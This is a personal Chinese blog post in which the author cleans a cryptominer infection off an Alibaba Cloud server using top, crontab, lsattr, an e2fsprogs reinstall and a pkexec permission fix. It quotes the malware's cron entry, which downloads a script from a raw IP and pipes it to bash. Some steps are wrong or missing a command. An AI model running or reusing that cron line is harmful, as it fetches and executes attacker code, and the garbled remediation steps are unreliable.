记录_第一次解决挖矿程序入侵问题 _面板

记录第一次处理，服务器也被挖矿程序入侵，原本是不想处理的，但是阿里云一直给我警告，然后再不处理服务器给我停了，这导致我立马打开电脑进行处理，怎么处理的我也不会啊，就一直百度，还是解决了（应该是解决了吧）
1、使用top命令查看可疑进程
top
2、去我们的异常事件的目录下检查可疑程序，然后删除
cd /var/tmp/.crypto/.../rm -f httpd
3、我看网上说存在定时任务自动入侵，的，使用如下命令查看是否存在定时任务
crontab -l#如下是定时任务*/30 * * * * /bin/cdz -fsSL http://104.192.82.138/s3f1015/a/a.sh | bash > /dev/null 2>&1
4、真的存在者玩意儿，然后使用使用- e进入定时任务的编辑框，使用dd命令删除里面内容，然后wq! 强制保存退出
5、我以为已经删除了，再次查看，定时任务依旧存在，任务内容依旧存在，我裂开了啊，而且给我弹出来下边这个
我没有权限，删除定时任务，wtf，继续百度得到以下步骤
6、先进入/var/spool下查看cron目录是正常的，但是在cron里面没有权限建立文件这个根源可以尝试先在/var/spool/cron目录下用vim编辑一个测试文件，看是否可以保存在这个cron目录下，如果无法保存提示权限问题。
那么可能目录有什么特殊的地方，root用户也被约束了
7、然后执行 + 路径查看是否有特殊的属性
lsattr /var/spool/cron/
发现，真尼玛的存在特殊权限了
8、接下来说是除去这个特殊属性即可，使用命令
lsattr /var/spool/cron/
经过执行的得到如下结果
艹，命令被删除了，这个垃圾的违法分子真实绝了
9、通过一顿百度找到解决办法，就是如下步骤，目的是安装
yum remove e2fsprogs//此步骤注意同时会删掉很多依赖的包yum -y install 上一步被删掉的依赖包yum -y install e2fsprogs
以上三个操作执行完毕后，命令就安装好，呜呜！
10、然后执行命令
【记录_第一次解决挖矿程序入侵问题】定时任务终于被删除了，真糟心啊~
11、然后就是去阿里云的控制台检测以下，发现存在漏洞，说的是的一堆，大概意思就是当前服务器有个漏洞，违法分子可以通过这个漏洞获取服务器的root权限，可以执行如下命令解决
[root@songqixiang ...]# chmod 0755 /usr/bin/pkexec
12、然后就完事儿，第一次遇见不知道是不是解决了，如果没决绝，服务器不会真的给我停了叭！
13、反正最后是这个样子，如果真没解决我也没招了，还得请大佬看看吧！
追加：上面所有操作搞完后，晚上阿里云又给我发短信了，说发现挖矿程序，我真是裂开了啊，心态崩了，又经过一段搜，对这个挖矿程序做了如下的处理!
出现问题：服务器内存异常
Top面板查看服务器内存情况时，发现有不知去向的内存。一部分内存空间观测不到程序的占用。
1、Top面板上展示异常
Top面板展示刚才输入的top命令异常：top命令被篡改为top.
2、Top命令被篡改
进入目录/usr/bin中查找top可执行文件：
ll /usr/bin/top*
结果如下：
通过文件大小判断，top命令被篡改，看看里面内容：